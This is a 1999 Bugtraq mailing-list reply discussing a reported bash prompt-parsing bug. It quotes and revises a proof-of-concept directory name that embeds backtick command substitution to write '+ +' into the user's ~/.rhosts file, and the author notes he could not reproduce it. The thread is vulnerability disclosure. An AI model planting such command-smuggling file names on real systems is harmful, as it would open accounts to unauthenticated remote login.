Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

Re: Bash Bug

From: pcg () GOOF COM (Marc Lehmann)
Date: Thu, 22 Apr 1999 03:18:48 +0200

On Tue, Apr 20, 1999 at 09:25:47PM -0400, Shadow wrote:


If a user creates a directory with a command like

mkdir "\ `echo -e \ "echo + +> ~\57.rhosts\ " > x; source x; rm -f \x\ ` "


It seems to me that this is related to the prompt string parsing. If yes,
then bash is not vulnerable unless configured to display the current
directory (correct me if the root of the problem is different).

Some additional notes:

- I was unable to reproduce this on my system, even when bash is configured
  to display the current path in the prompt. (bash 2.02.1(1))
- The original example seemed to have too much whitespace. I used:
  mkdir "\`echo -e \"echo + +> ~\57.rhosts\" > x; source x; rm -f \x\`"
- PS1 was set to \h:\w\$

HTH

--
      -----==-                                             |
      ----==-- _                                           |
      ---==---(_)__  __ ____  __       Marc Lehmann      +--
      --==---/ / _ \/ // /\ \/ /       pcg () goof com      |e|
      -=====/_/_//_/\_,_/ /_/\_\       XX11-RIPE         --+
    The choice of a GNU generation                       |
                                                         |
Previous By Date Next
Previous By Thread Next

Current thread: